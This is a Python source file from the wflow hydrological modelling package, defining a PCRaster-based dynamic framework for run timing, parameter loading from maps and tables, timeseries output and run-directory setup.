text
stringlengths 12
1.05M
| repo_name
stringlengths 5
86
| path
stringlengths 4
191
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 12
1.05M
| keyword
listlengths 1
23
| text_hash
stringlengths 64
64
|
|---|---|---|---|---|---|---|---|
"""
wf_DynamicFramework
-------------------
This is a replacement for the standard pcraster/python DynamicFramwork class.\
It provides extra functionality to simplify linking the models build in the framework
with other models. The provided functionality allows external programs to control
and interrogate the model.
"""
# TODO: Remove command-line options from models such as -F that is now in the ini
# TODO: Fix timestep not forewarding in BMI runs (for reading writing maps)
import calendar
import configparser
import csv
import datetime
import glob
import logging
import shutil
import traceback
from collections import namedtuple
from functools import reduce
import numpy as np
from wflow.wf_netcdfio import *
import pcraster as pcr
import pcraster.framework
from wflow import pcrut
from wflow import wflow_adapt
from wflow.wflow_lib import *
from wflow import __version__
import time # last to prevent clobbering by *
def log_uncaught_exceptions(ex_cls, ex, tb):
global logging
logging.error("".join(traceback.format_tb(tb)))
logging.error("{0}: {1}".format(ex_cls, ex))
sys.excepthook = log_uncaught_exceptions
logging.getLogger("foo").addHandler(logging.NullHandler())
class runDateTimeInfo:
"""
class to maintain and retrieve date/time info of the model run. IN order to support
difefrent views on date/time the class supports both a step (each input time is timestep) and
an interval base method (each model timestep is the interval between two input timesteps)
"""
def __init__(
self,
datetimestart=dt.datetime(1990, 1, 1),
datetimeend=dt.datetime(1990, 1, 5),
timestepsecs=86400,
mode="steps",
):
self.runStartTime = datetimestart
self.runEndTime = datetimeend
self.timeStepSecs = timestepsecs
self.currentTimeStep = 0
self.lastTimeStep = 0
self.startadjusted = 0
self.startendadjusted = 0
self.currentmode = mode
self.callstopupdate = 0
if mode == "steps":
self.runStateTime = self.runStartTime - datetime.timedelta(
seconds=self.timeStepSecs
)
else:
self.runStateTime = self.runStartTime
self.setByBMI = False
self.currentDateTime = self.runStateTime
self.outPutStartTime = self.runStateTime + datetime.timedelta(
seconds=self.timeStepSecs
)
self.runTimeSteps = (
calendar.timegm(self.runEndTime.utctimetuple())
- calendar.timegm(self.runStateTime.utctimetuple())
) / self.timeStepSecs
self.currentMonth = self.currentDateTime.month
self.currentYday = self.currentDateTime.timetuple().tm_yday
self.currentHour = self.currentDateTime.hour
self.nextDateTime = self.currentDateTime + datetime.timedelta(
seconds=self.timeStepSecs
)
self.lastTimeStep = self.runTimeSteps + self.currentTimeStep
def __str__(self):
a = self.__dict__
return str(a)
def update(
self,
timestepsecs=None,
datetimestart=None,
datetimeend=None,
currentTimeStep=None,
currentDatetime=None,
runTimeSteps=None,
mode="steps",
incrementStep=False,
setByBMI=False,
):
"""
Updates the content of the framework date/time object. Use only one input parameter per call. or runTimeSteps and datatimestart at the same time
use the mode option to switch between steps and intervals ('steps' or 'intervals')
:param timestepsecs:
:param datetimestart: data time start of the input data
:param datetimeend:
:param currentTimeStep:
:param currentDatetime:
:return:
"""
self.currentmode = mode
self.callstopupdate = self.callstopupdate + 1
if setByBMI:
self.setByBMI = True
if timestepsecs and not runTimeSteps:
self.timeStepSecs = timestepsecs
self.runTimeSteps = (
calendar.timegm(self.runEndTime.utctimetuple())
- calendar.timegm(self.runStateTime.utctimetuple())
) / self.timeStepSecs
if self.currentmode == "steps":
self.runStateTime = self.runStartTime - datetime.timedelta(
seconds=self.timeStepSecs
)
self.outPutStartTime = self.runStateTime + datetime.timedelta(
seconds=self.timeStepSecs
)
elif timestepsecs and runTimeSteps:
self.timeStepSecs = timestepsecs
self.runTimeSteps = runTimeSteps
if datetimestart:
self.currentTimeStep = 1
# if self.startadjusted
if self.currentmode == "steps":
self.runStartTime = datetimestart
self.startadjusted = 0
self.runStateTime = self.runStartTime - datetime.timedelta(
seconds=self.timeStepSecs
)
else:
# self.runStartTime = datetimestart + datetime.timedelta(seconds=self.timeStepSecs)
self.runStartTime = (
datetimestart
) # + datetime.timedelta(seconds=self.timeStepSecs)
self.startadjusted = 1
self.runStateTime = (
self.runStartTime
) # - datetime.timedelta(seconds=self.timeStepSecs)
self.currentDateTime = self.runStateTime
self.outPutStartTime = self.currentDateTime + datetime.timedelta(
seconds=self.timeStepSecs
)
self.runTimeSteps = (
calendar.timegm(self.runEndTime.utctimetuple())
- calendar.timegm(self.runStateTime.utctimetuple())
) / self.timeStepSecs
if self.runTimeSteps < 1: # End time before start time
self.runTimeSteps = 1
self.runEndTime = self.runStateTime + datetime.timedelta(
seconds=self.timeStepSecs * self.runTimeSteps
)
if datetimestart and runTimeSteps:
self.currentTimeStep = 1
self.currentDateTime = self.runStartTime
if self.currentmode == "steps":
self.runStartTime = datetimestart
self.startadjusted = 0
self.runStateTime = self.runStartTime - datetime.timedelta(
seconds=self.timeStepSecs
)
else:
self.runStartTime = (
datetimestart
) # + datetime.timedelta(seconds=self.timeStepSecs)
self.startadjusted = 1
self.runStateTime = self.runStartTime
self.outPutStartTime = self.runStateTime + datetime.timedelta(
seconds=self.timeStepSecs
)
self.currentDateTime = self.runStartTime
self.runEndTime = self.runStateTime + datetime.timedelta(
seconds=self.timeStepSecs * runTimeSteps
)
if datetimeend:
self.runEndTime = datetimeend
self.runTimeSteps = (
calendar.timegm(self.runEndTime.utctimetuple())
- calendar.timegm(self.runStateTime.utctimetuple())
) / self.timeStepSecs
if self.runTimeSteps < 1: # End time before start time
self.runTimeSteps = 1
self.runStartTime = self.runEndTime - datetime.timedelta(
seconds=self.timeStepSecs * self.runTimeSteps
)
if currentTimeStep and currentTimeStep != self.currentTimeStep:
self.currentTimeStep = currentTimeStep
self.currentDateTime = self.runStateTime + datetime.timedelta(
seconds=self.timeStepSecs * (self.currentTimeStep - 1)
)
if incrementStep:
self.currentTimeStep = self.currentTimeStep + 1
self.currentDateTime = self.currentDateTime + datetime.timedelta(
seconds=self.timeStepSecs
)
if currentDatetime:
self.currentDateTime = currentDatetime
self.currentTimeStep = (
calendar.timegm(self.currentDateTime.utctimetuple())
- calendar.timegm(self.runStateTime.utctimetuple())
) / self.timeStepSecs + 1
self.nextDateTime = self.currentDateTime + datetime.timedelta(
seconds=self.timeStepSecs
)
self.lastTimeStep = self.runTimeSteps
self.currentMonth = self.currentDateTime.month
self.currentYday = self.currentDateTime.timetuple().tm_yday
self.currentHour = self.currentDateTime.hour
class wf_exchnageVariables:
"""
List of exchange variables
The style determined how they are used
- 1: read from file like normal
- 2: set by the api in mem (for consistency this is style 0 in the ini file)
"""
def __init__(self):
self.vars = []
def varexists(self, name):
exists = 0
for item in self.vars:
if item[0] == name:
exists = 1
return exists
def addvar(self, name, role, unit):
if not self.varexists(name):
if unit == "0":
unit = "mm/timestep"
elif unit == "1":
unit = "m^3/sec"
elif unit == "2":
unit = "ma"
elif unit == "3":
unit = "degree Celcius"
elif unit == "4":
unit = "mm"
elif unit == "5":
unit = "-"
tvar = [name, role, unit]
self.vars.append(tvar)
def getvars(self):
return self.vars
def getvarStyle(self, name):
"""
returns 2 if this is a input variable to be set from api otherwise 1
( in the ini 0 is for in memory variables)
A bit confusing!!!
"""
for xx in self.vars:
if xx.__contains__(name):
if xx[1] == 0:
return 2
else:
return 1
return 1
class wf_online_stats:
def __init__(self):
"""
:param invarname:
:param mode:
:param points:
:param filename:
"""
self.count = {}
self.rangecount = {}
self.result = {}
self.mode = {}
self.points = {}
self.filename = {}
self.statvarname = {}
def addstat(self, name, mode="mean", points=30, filename=None):
"""
:param name:
:param mode:
:param points:
:param filename:
:return:
"""
self.statvarname[name] = name + "_" + mode + "_" + str(points)
self.mode[name] = mode
self.points[name] = points
self.count[name] = 0
self.rangecount[name] = 0
self.filename[name] = filename
def getstat(self, data, name):
"""
:param data:
:param name:
:return:
"""
if self.count[name] == 0:
self.result[name] = data
else:
if self.mode[name] == "mean":
self.result[name] = (
self.result[name] * (self.points[name] - 1) / self.points[name]
+ data / self.points[name]
)
self.count[name] = self.count[name] + 1
return pcr.scalar(self.result[name])
class wf_sumavg:
def __init__(self, varname, mode="sum", filename=None):
"""
Class to hold variable in the usermodel that must be averaged summed etc.
"""
if filename == None:
filename = varname
self.mode = mode
self.varname = varname
self.filename = filename
self.data = []
self.count = 0
self.result = []
self.availtypes = ["sum", "avg", "min", "max"]
def add_one(self, data):
"""
Ad a map (timmestep)
"""
if self.count == 0:
self.data = data
else:
if self.mode == "sum" or self.mode == "avg":
self.data = self.data + data
if self.mode == "max":
self.data = pcr.max(self.data, data)
if self.mode == "min":
self.data = pcr.min(self.data, data)
self.count = self.count + 1
def finalise(self):
"""
Perform final calculations if needed (average, etc) and assign to the
result variable
"""
if hasattr(self.data, "isSpatial"):
if self.mode == "sum" or self.mode == "min" or self.mode == "max":
self.result = self.data
if self.mode == "avg":
self.result = self.data / self.count
class wf_OutputTimeSeriesArea:
def __init__(self, area, oformat="csv", areafunction="average", tformat="steps"):
"""
Replacement timeseries output function for the pcraster framework
area - an area-map to average from
oformat - format of the output file (csv, txt, tss, only csv and tss at the moment)
tformat - steps of datetime (format of the timsteps/stamp)
Step 1: make average of variable using the areaverage function
Step 2: Sample the values from the areas (remember the index so we can do it faster lateron)
step 3: store them in order
"""
self.steps = 0
self.timeformat = tformat
self.area = area
self.areanp = pcr.pcr2numpy(area, 0).copy()
self.oformat = oformat
self.areafunction = areafunction
""" average, total, minimum, maximum, majority"""
self.flatarea, self.idx = np.unique(self.areanp, return_index=True)
# print self.flatarea
# self.flatarea = self.flatarea[np.isfinite(self.flatarea)]
# self.idx = self.idx[np.isfinite(self.flatarea)]
self.fnamelist = []
self.writer = []
self.ofile = []
def closeall(self):
"""
Close all open filepointers
"""
for fp in self.ofile:
fp.close()
self.fnamelist = []
self.writer = []
self.ofile = []
def writestep(self, variable, fname, timestep=None, dtobj=None):
"""
write a single timestep
variable - pcraster map to save to tss
fname - name of the timeseries file
"""
# Add new file if not already present
if fname not in self.fnamelist:
bufsize = 1 # Implies line buffered
self.fnamelist.append(fname)
self.ofile.append(open(fname, "w", bufsize, newline="\n"))
if self.oformat == "csv": # Always the case
self.writer.append(csv.writer(self.ofile[-1]))
self.ofile[-1].write("# Timestep,")
self.writer[-1].writerow(self.flatarea)
elif self.oformat == "tss": # test
self.writer.append(csv.writer(self.ofile[-1], delimiter=" "))
self.ofile[-1].write("timeseries scalar\n")
self.ofile[-1].write(str(len(self.flatarea) + 1) + "\n")
self.ofile[-1].write("timestep\n")
for idd in self.flatarea:
self.ofile[-1].write(str(idd) + "\n")
else:
print("Not implemented yet")
self.steps = self.steps + 1
tmpvar = pcr.spatial(pcr.scalar(variable))
if self.areafunction == "average":
self.resmap = pcr.areaaverage(tmpvar, pcr.nominal(self.area))
elif self.areafunction == "total":
self.resmap = pcr.areatotal(tmpvar, pcr.nominal(self.area))
elif self.areafunction == "maximum":
self.resmap = pcr.areamaximum(tmpvar, pcr.nominal(self.area))
elif self.areafunction == "minimum":
self.resmap = pcr.areaminimum(tmpvar, pcr.nominal(self.area))
elif self.areafunction == "majority":
self.resmap = pcr.areamajority(tmpvar, pcr.nominal(self.area))
else:
self.resmap = pcr.areaaverage(tmpvar, pcr.nominal(self.area))
self.remap_np = pcr.pcr2numpy(self.resmap, 0)
self.flatres = self.remap_np.flatten()[self.idx]
thiswriter = self.fnamelist.index(fname)
if dtobj and self.timeformat == "datetime":
self.writer[thiswriter].writerow([str(dtobj)] + self.flatres.tolist())
elif timestep:
self.writer[thiswriter].writerow([timestep] + self.flatres.tolist())
else:
self.writer[thiswriter].writerow([self.steps] + self.flatres.tolist())
# self.flatres = np.insert(self.flatres,0,self.steps)
class wf_DynamicFramework(pcraster.framework.frameworkBase.FrameworkBase):
## \brief Constructor
#
# \param userModel class containing the user model
# \param lastTimeStep last timestep to run
# \param firstTimestep sets the starting timestep of the model (optional,
# default is 1)
#
def __init__(
self,
userModel,
lastTimeStep=0,
firstTimestep=1,
datetimestart=dt.datetime(1990, 1, 1),
timestepsecs=86400,
):
pcraster.framework.frameworkBase.FrameworkBase.__init__(self)
self.ParamType = namedtuple(
"ParamType", "name stack type default verbose lookupmaps"
)
self.modelparameters = [] # list of model parameters
self.modelparameters_changes_once = {}
self.modelparameters_changes_timestep = {}
self.exchnageitems = wf_exchnageVariables()
self.setQuiet(True)
self.reinit = 0
self._d_model = userModel
self._testRequirements()
dte = datetimestart + datetime.timedelta(
seconds=(lastTimeStep - firstTimestep) * timestepsecs
)
self.DT = runDateTimeInfo(
timestepsecs=timestepsecs,
datetimestart=datetimestart,
datetimeend=dte,
mode="steps",
)
if lastTimeStep != 0:
if firstTimestep == 0:
firstTimestep = 1
self.DT.update(runTimeSteps=(lastTimeStep - firstTimestep))
self.DT.update(currentTimeStep=firstTimestep - 1)
self.setviaAPI = {}
# Flag for each variable. If 1 it is set by the API before this timestep. Reset is done at the end of each timestep
if firstTimestep > lastTimeStep:
msg = (
"Cannot run dynamic framework: Start timestep smaller than end timestep"
)
raise pcraster.framework.frameworkBase.FrameworkError(msg)
# fttb
self._addMethodToClass(self._readmapNew)
self._addMethodToClass(self._reportNew)
self._addMethodToClass(self.wf_suspend)
self._addMethodToClass(self.wf_resume)
self._addMethodToClass(self.wf_readmap)
self._addMethodToClass(self.wf_multparameters)
self._addMethodToClass(self.wf_readmapClimatology)
self._addMethodToClass(self.readtblDefault)
self._addMethodToClass(self.readtblLayersDefault)
self._addMethodToClass(self.readtblFlexDefault)
self._addMethodToClass(self.wf_supplyVariableNamesAndRoles)
self._addMethodToClass(self.wf_updateparameters)
self._addMethodToClass(self.wf_savesummarymaps)
self._addMethodToClass(self.wf_supplyStartTimeDOY)
self._addMethodToClass(self.wf_supplyStartTime)
self._addMethodToClass(self.wf_supplyJulianDOY)
self._addMethodToClass(self.wf_supplyStartDateTime)
self._addMethodToClass(self.wf_supplyCurrentDateTime)
self._addMethodToClass(self.wf_supplyEndTime)
self._addAttributeToClass("ParamType", self.ParamType)
self._addAttributeToClass("timestepsecs", self.DT.timeStepSecs)
self._addAttributeToClass("__version__", __version__)
# self._addAttributeToClass("__release__", __release__)
# self._addAttributeToClass("__build__", __build__)
self.skipfirsttimestep = 0
if firstTimestep == 0:
firstTimestep = 1
# self._userModel()._setNrTimeSteps(lastTimeStep - firstTimestep + 1)
# self._userModel()._setNrTimeSteps(self.DT.runTimeSteps)
# self._d_firstTimestep = 1
# self._userModel()._setFirstTimeStep(1)
# self._d_lastTimestep = self.DT.runTimeSteps
# self.APIDebug = 0
# self._userModel().currentdatetime = self.DT.currentDateTime
# self._userModel()._setCurrentTimeStep(firstTimestep)
self._update_time_from_DT()
self.TheClone = (
pcr.scalar(pcr.xcoordinate((pcr.spatial(pcr.boolean(1.0))))) * 0.0
)
def _update_time_from_DT(self):
"""
:return:
"""
self._userModel()._setNrTimeSteps(int(self.DT.runTimeSteps))
self._d_firstTimestep = 1
self._userModel()._setFirstTimeStep(1)
self._d_lastTimestep = self.DT.runTimeSteps
self.APIDebug = 0
self._userModel().currentdatetime = self.DT.currentDateTime
if self.DT.currentTimeStep == 0:
self._userModel()._setCurrentTimeStep(1)
else:
self._userModel()._setCurrentTimeStep(int(self.DT.currentTimeStep))
self._userModel().timestepsecs = self.DT.timeStepSecs
def wf_multparameters(self):
"""
:return:
"""
if self._userModel()._inDynamic():
for cmdd in self.modelparameters_changes_timestep:
var = cmdd.replace("self._userModel().", "").strip()
if not hasattr(self._userModel(), var):
self.logger.error(
"Variable change (apply_timestep) could not be applied to "
+ str(var)
)
else:
setattr(
self._userModel(),
var,
getattr(self._userModel(), var)
* float(
self.modelparameters_changes_timestep[cmdd].split("*")[1]
), # self.modelparameters_changes_timestep[cmdd],
)
self.logger.warning(
"Variable change (apply_timestep) applied to "
+ str(var)
+ " with factor"
+ self.modelparameters_changes_timestep[cmdd].split("*")[1]
)
if self._userModel()._inInitial():
# import pdb; pdb.set_trace()
for cmdd in self.modelparameters_changes_once:
var = cmdd.replace("self._userModel().", "").strip()
# for List objects in topoflex
if '[' in var:
listnr = var.split('[')[-1].split(']')[0]
varname = var.split('[')[0]
mapmult = getattr(self._userModel(), varname)[int(listnr)] * float(self.modelparameters_changes_once[cmdd].split('*')[1])
getattr(self._userModel(), varname)[int(listnr)] = mapmult
self.logger.warning(
"Variable change (apply_once) applied to "
+ str(var) + " with factor" + self.modelparameters_changes_once[cmdd].split('*')[1]
)
# for List objects in sbm
elif var.split('_')[-1].isdigit():
mapmult = getattr(self._userModel(), var.split('_')[0])[int(var.split('_')[-1])] * float(self.modelparameters_changes_once[cmdd].split("*")[1])
getattr(self._userModel(),var.split('_')[0])[int(var.split('_')[-1])] = mapmult
self.logger.warning(
"Variable change (apply_once) applied to "
+ str(var.split('_')[0]) + str([int(var.split('_')[-1])]) + " with factor" + self.modelparameters_changes_once[cmdd].split('*')[1]
)
elif not hasattr(self._userModel(), var):
self.logger.error(
"Variable change (apply_once) could not be applied to "
+ str(var)
)
else:
setattr(
self._userModel(),
var,
getattr(self._userModel(), var)
* float(self.modelparameters_changes_once[cmdd].split("*")[1]),
)
self.logger.warning(
"Variable change (apply_once) applied to "
+ str(var)
+ " with factor"
+ self.modelparameters_changes_once[cmdd].split("*")[1]
)
def wf_updateparameters(self):
"""
Update the model Parameters (can be used in static and dynamic part of the model)
It does this by looking at the parameters listed in [parameters] section in the
ini file and those defined in the parameters() function in the actual model
(defined by the model developer).
:return nothing:
"""
for par in self.modelparameters:
if self._userModel()._inInitial():
if par.type == "tbl" or par.type == "tblsparse":
if not hasattr(self._userModel(), par.name):
self._userModel().logger.info(
"Initial: Adding " + par.name + " to model."
)
tblname = os.path.join(self._userModel().Dir, par.stack)
theparmap = self.readtblFlexDefault(
tblname, par.default, *par.lookupmaps
)
setattr(self._userModel(), par.name, theparmap)
if par.type == "statictbl":
if not hasattr(self._userModel(), par.name):
self._userModel().logger.info(
"Adding " + par.name + " to model."
)
tblname = os.path.join(self._userModel().Dir, par.stack)
theparmap = self.readtblDefault(
tblname,
self._userModel().LandUse,
self._userModel().TopoId,
self._userModel().Soil,
par.default,
)
setattr(self._userModel(), par.name, theparmap)
if par.type == "staticmap":
if not hasattr(self._userModel(), par.name):
self._userModel().logger.info(
"Adding " + par.name + " to model."
)
fname = os.path.join(self._userModel().Dir, par.stack)
fileName, fileExtension = os.path.splitext(fname)
if fileExtension == ".map":
theparmap = self.wf_readmap(
fname, par.default, fail=int(par.verbose)
)
else:
self._userModel().logger.error(
fname + " Does not have a .map extension"
)
setattr(self._userModel(), par.name, theparmap)
if self._userModel()._inDynamic() or self._userModel()._inInitial():
if par.type == "timeseries":
if not hasattr(self._userModel(), par.name):
self._userModel().logger.info(
"Adding " + par.name + " to model."
)
theparmap = self.wf_readmap(
os.path.join(self._userModel().caseName, par.stack),
par.default,
verbose=int(par.verbose),
)
theparmap = pcr.cover(theparmap, par.default)
setattr(self._userModel(), par.name, theparmap)
if par.type == "monthlyclim":
if not hasattr(self._userModel(), par.name):
self._userModel().logger.info(
"Adding " + par.name + " to model."
)
theparmap = self.wf_readmapClimatology(
os.path.join(self._userModel().caseName, par.stack),
kind=1,
default=par.default,
verbose=int(par.verbose),
)
theparmap = pcr.cover(theparmap, par.default)
setattr(self._userModel(), par.name, theparmap)
if par.type == "tblmonthlyclim":
if not hasattr(self._userModel(), par.name):
self._userModel().logger.info(
"Initial: Adding " + par.name + " to model."
)
month = self.DT.currentDateTime.month
ptex = os.path.splitext(par.stack)
newName = ptex[0] + "_" + str(month) + ptex[1]
tblname = os.path.join(self._userModel().Dir, newName)
theparmap = self.readtblFlexDefault(
tblname, par.default, *par.lookupmaps
)
setattr(self._userModel(), par.name, theparmap)
if par.type == "hourlyclim":
if not hasattr(self._userModel(), par.name):
self._userModel().logger.info(
"Adding " + par.name + " to model."
)
print("hourlyclim has " + par.name + par.stack)
print("not been implemented yet")
if par.type == "dailyclim":
if not hasattr(self._userModel(), par.name):
self._userModel().logger.info(
par.name + " is not defined yet, adding anyway."
)
theparmap = self.wf_readmapClimatology(
os.path.join(self._userModel().caseName, par.stack),
kind=2,
default=par.default,
verbose=int(par.verbose),
)
setattr(self._userModel(), par.name, theparmap)
if self._userModel()._inDynamic():
if par.type == "tss":
if not hasattr(self._userModel(), par.name):
self._userModel().logger.info(
par.name + " is not defined yet, adding anyway."
)
theparmap = self.wf_timeinputscalar(
os.path.join(self._userModel().caseName, par.stack),
os.path.join(self._userModel().caseName, par.lookupmaps[0]),
par.default,
)
setattr(self._userModel(), par.name, theparmap)
if par.type == "tblts":
if not hasattr(self._userModel(), par.name):
self._userModel().logger.info(
"Adding " + par.name + " to model."
)
tblname = os.path.join(
self._userModel().Dir,
par.stack + "_" + str(self._userModel().currentStep),
)
theparmap = self.readtblFlexDefault(
tblname, par.default, *par.lookupmaps
)
setattr(self._userModel(), par.name, theparmap)
if par.type == "tblsparse":
if not hasattr(self._userModel(), par.name):
self._userModel().logger.info(
"Adding " + par.name + " to model."
)
tblname = os.path.join(
self._userModel().Dir,
par.stack + "_" + str(self._userModel().currentStep),
)
# Only added a new table if available
if os.path.exists(tblname):
theparmap = self.readtblFlexDefault(
tblname, par.default, *par.lookupmaps
)
setattr(self._userModel(), par.name, theparmap)
self.setviaAPI = {}
def wf_supplyStartTimeDOY(self):
DOY = self.DT.runStartTime.utctimetuple().tm_yday
return DOY
def wf_supplyJulianDOY(self):
JDOY = self.DT.currentYday - (
calendar.isleap(self.DT.currentDateTime.timetuple().tm_year)
and self.DT.currentYday > 60
)
return JDOY
def wf_timeinputscalar(self, tssfile, areamap, default):
"""
:param tssfile:
:param areamap:
:return: tss converted to a map
"""
return pcr.cover(pcr.timeinputscalar(tssfile, pcr.nominal(areamap)), default)
def _wf_shutdown(self):
"""
Makes sure the logging closed
"""
if hasattr(self, "NcOutput"):
self.NcOutput.finish()
fp = open(
os.path.join(
self._userModel().caseName, self._userModel().runId, "configofrun.ini"
),
"w",
)
self._userModel().config.write(fp)
fp.close()
for key, value in self.oscv.items():
value.closeall()
def loggingSetUp(
self, caseName, runId, logfname, model, modelversion, level=pcrut.logging.INFO
):
"""
Sets up the logging system assuming we are in the runId directory
"""
# Set logging
logfile = os.path.join(caseName, runId, logfname)
logger = pcrut.setlogger(logfile, model, thelevel=level)
logger.info(
model + " " + modelversion + " Case: " + caseName + " Runid: " + runId
)
return logger
def readtblDefault(self, pathtotbl, landuse, subcatch, soil, default):
"""
First check if a prepared maps of the same name is present
in the staticmaps directory. next try to
read a tbl file to match a landuse, catchment and soil map. Returns
the default value if the tbl file is not found.
Finally check of a tbl file exists with a .mult postfix (e.g. Cmax.tbl.mult) and apply the
multiplication to the loaded data.
Input:
- pathtotbl: full path to table file
- landuse: landuse map
- subcatch: subcatchment map
- soil: soil map
- default: default value
Output:
- map constructed from tbl file or map with default value
.. todo::
Add checking for missing values
"""
mapname = os.path.join(
os.path.dirname(pathtotbl),
"../staticmaps",
os.path.splitext(os.path.basename(pathtotbl))[0] + ".map",
)
if os.path.exists(mapname):
self.logger.info("reading map parameter file: " + mapname)
rest = pcr.cover(pcr.readmap(mapname), default)
else:
if os.path.isfile(pathtotbl):
rest = pcr.lookupscalar(pathtotbl, landuse, subcatch, soil)
self.logger.info("Creating map from table: " + pathtotbl)
else:
self.logger.warning(
"tbl file not found ("
+ pathtotbl
+ ") returning default value: "
+ str(default)
)
rest = pcr.spatial(pcr.cover(pcr.scalar(default)))
cmask = self._userModel().TopoId
cmask = pcr.ifthen(cmask > 0, cmask)
totalzeromap = pcr.pcr2numpy(
pcr.maptotal(pcr.scalar(pcr.defined(cmask))), 0
)
resttotal = pcr.pcr2numpy(pcr.maptotal(pcr.scalar(pcr.defined(rest))), 0)
if resttotal[0, 0] < totalzeromap[0, 0]:
self.logger.error(
"Not all catchment cells have a value for ["
+ pathtotbl
+ "] : "
+ str(resttotal[0, 0])
+ "!="
+ str(totalzeromap[0, 0])
)
# Apply multiplication table if present
multname = os.path.dirname(pathtotbl) + ".mult"
if os.path.exists(multname):
multfac = pcr.lookupscalar(multname, landuse, subcatch, soil)
rest = rest * multfac
self.logger.info("Applying multiplication from table: " + multname)
return rest
def readtblLayersDefault(self, pathtotbl, landuse, subcatch, soil, n, default):
"""
First check if a prepared maps of the same name is present
in the staticmaps directory. next try to
read a tbl file to match a landuse, catchment and soil map. Returns
the default value if the tbl file is not found.
Finally check of a tbl file exists with a .mult postfix (e.g. Cmax.tbl.mult) and apply the
multiplication to the loaded data.
Input:
- pathtotbl: full path to table file
- landuse: landuse map
- subcatch: subcatchment map
- soil: soil map
- default: default value
Output:
- map constructed from tbl file or map with default value
.. todo::
Add checking for missing values
"""
mapname = os.path.join(
os.path.dirname(pathtotbl),
"../staticmaps",
os.path.splitext(os.path.basename(pathtotbl))[0] + "_" + str(n) + ".map",
)
if os.path.exists(mapname):
self.logger.info("reading map parameter file: " + mapname)
rest = pcr.cover(pcr.readmap(mapname), default)
else:
if os.path.isfile(pathtotbl):
rest = pcr.lookupscalar(
pathtotbl, landuse, subcatch, soil, pcr.cover(0.0) + n
)
self.logger.info("Creating map from table: " + pathtotbl)
else:
self.logger.warning(
"tbl file not found ("
+ pathtotbl
+ ") returning default value: "
+ str(default)
)
rest = pcr.spatial(pcr.cover(pcr.scalar(default)))
cmask = self._userModel().TopoId
cmask = pcr.ifthen(cmask > 0, cmask)
totalzeromap = pcr.pcr2numpy(
pcr.maptotal(pcr.scalar(pcr.defined(cmask))), 0
)
resttotal = pcr.pcr2numpy(pcr.maptotal(pcr.scalar(pcr.defined(rest))), 0)
if resttotal[0, 0] < totalzeromap[0, 0]:
self.logger.warning(
"Not all catchment cells have a value for ["
+ pathtotbl
+ "] : "
+ str(resttotal[0, 0])
+ "!="
+ str(totalzeromap[0, 0])
)
# Apply multiplication table if present
multname = os.path.dirname(pathtotbl) + ".mult"
if os.path.exists(multname):
multfac = pcr.lookupscalar(multname, landuse, subcatch, soil)
rest = rest * multfac
self.logger.info("Applying multiplication from table: " + multname)
return rest
def readtblFlexDefault(self, pathtotbl, default, *args):
"""
First check if a prepared maps of the same name is present
in the staticmaps directory. next try to
read a tbl file to match a number of maps. Returns
the default value if the tbl file is not found.
Finally check of a tbl file exists with a .mult postfix (e.g. Cmax.tbl.mult) and apply the
multiplication to the loaded data.
Input:
- pathtotbl: full path to table file
- default: default value
- *args: maps for the lookup table directly fed to lookupscalar
Output:
- map constructed from tbl file or map with default value
.. todo::
Add checking for missing values
"""
mapname = (
os.path.dirname(pathtotbl)
+ "/../staticmaps/"
+ os.path.splitext(os.path.basename(pathtotbl))[0]
+ ".map"
)
if os.path.exists(mapname):
self.logger.info("Reading map parameter file: " + mapname)
rest = pcr.cover(pcr.readmap(mapname), default)
else:
if os.path.isfile(pathtotbl):
newargs = []
args = list(args)
for mapje in args:
if len(os.path.splitext(mapje)[1]) > 1: # We have an extension...
newargs.append(os.path.join(self._userModel().caseName, mapje))
# we specify a full map
else:
# Assume we have monthly climatology as no extension is present
theparmap = self.wf_readmapClimatology(
os.path.join(self._userModel().caseName, mapje),
kind=1,
default=default,
verbose=True,
)
theparmap = pcr.cover(theparmap, default)
newargs.append(theparmap)
for lmap in newargs:
if not os.path.exists(lmap):
rest = pcr.spatial(pcr.scalar(default))
self.logger.debug(
"map file not found ("
+ lmap
+ ") returning default value: "
+ str(default)
)
else:
rest = pcr.lookupscalar(pathtotbl, *newargs)
else:
self.logger.debug(
"tbl file not found ("
+ pathtotbl
+ ") returning default value: "
+ str(default)
)
rest = pcr.spatial(pcr.scalar(default))
# cmask = self._userModel().TopoId
# cmask = pcr.ifthen(cmask > 0,cmask)
# totalzeromap = pcr.pcr2numpy(pcr.maptotal(pcr.scalar(pcr.defined(cmask))),0)
# resttotal = pcr.pcr2numpy(pcr.maptotal(pcr.scalar(pcr.defined(rest))),0)
# if resttotal[0,0] < totalzeromap[0,0]:
# self.logger.warning("Not all catchment cells have a value for [" + pathtotbl + "] : " + str(resttotal[0,0]) + "!=" + str(totalzeromap[0,0]))
# Apply multiplication table if present
multname = os.path.dirname(pathtotbl) + ".mult"
if os.path.exists(multname):
multfac = pcr.lookupscalar(multname, *args)
rest = rest * multfac
self.logger.info("Applying multiplication from table: " + multname)
return rest
def createRunId(
self,
intbl="intbl",
logfname="wflow.log",
NoOverWrite=True,
model="model",
modelVersion="no version",
level=pcrut.logging.DEBUG,
doSetupFramework=True,
):
"""
Create runId dir and copy table files to it
Also changes the working dir to the case/runid directory
"""
caseName = self._userModel().caseName
runId = self._userModel().runId
if modelVersion == "no version":
modelVersion = __version__
configfile = self._userModel().configfile
if not os.path.isdir(caseName + "/" + runId):
os.makedirs(caseName + "/" + runId + "/outmaps/")
os.makedirs(caseName + "/" + runId + "/outstate/")
os.makedirs(caseName + "/" + runId + "/outsum/")
os.makedirs(caseName + "/" + runId + "/intbl/")
os.makedirs(caseName + "/" + runId + "/runinfo/")
else:
if os.path.exists(caseName + "/" + runId + "/run.tss"):
if NoOverWrite:
print(
"ERROR: refusing to overwrite an existing run: "
+ caseName
+ "/"
+ runId
+ "/run.tss"
)
sys.exit(1)
for file in glob.glob(caseName + "/" + intbl + "/*.tbl"):
shutil.copy(file, caseName + "/" + runId + "/" + intbl)
try:
shutil.copy(
caseName + "/" + configfile, caseName + "/" + runId + "/runinfo"
)
except:
print("Cannot find config file: " + caseName + "/" + configfile)
self._userModel().logger = self.loggingSetUp(
caseName, runId, logfname, model, modelVersion, level=level
)
self.logger = self._userModel().logger
self.logger.info(
"Initialise framework version: " + __version__
) # + "(" + __release__ + ")")
global logging
logging = self.logger
self._userModel().config = self.iniFileSetUp(caseName, runId, configfile)
modelnamefromobject = self._userModel().__module__
self.modelname = configget(
self._userModel().config, "model", "modeltype", "not set"
)
if self.modelname == "not set":
self.logger.warning(
"Ini file does not contain model name, assuming " + modelnamefromobject
)
self.modelname = modelnamefromobject
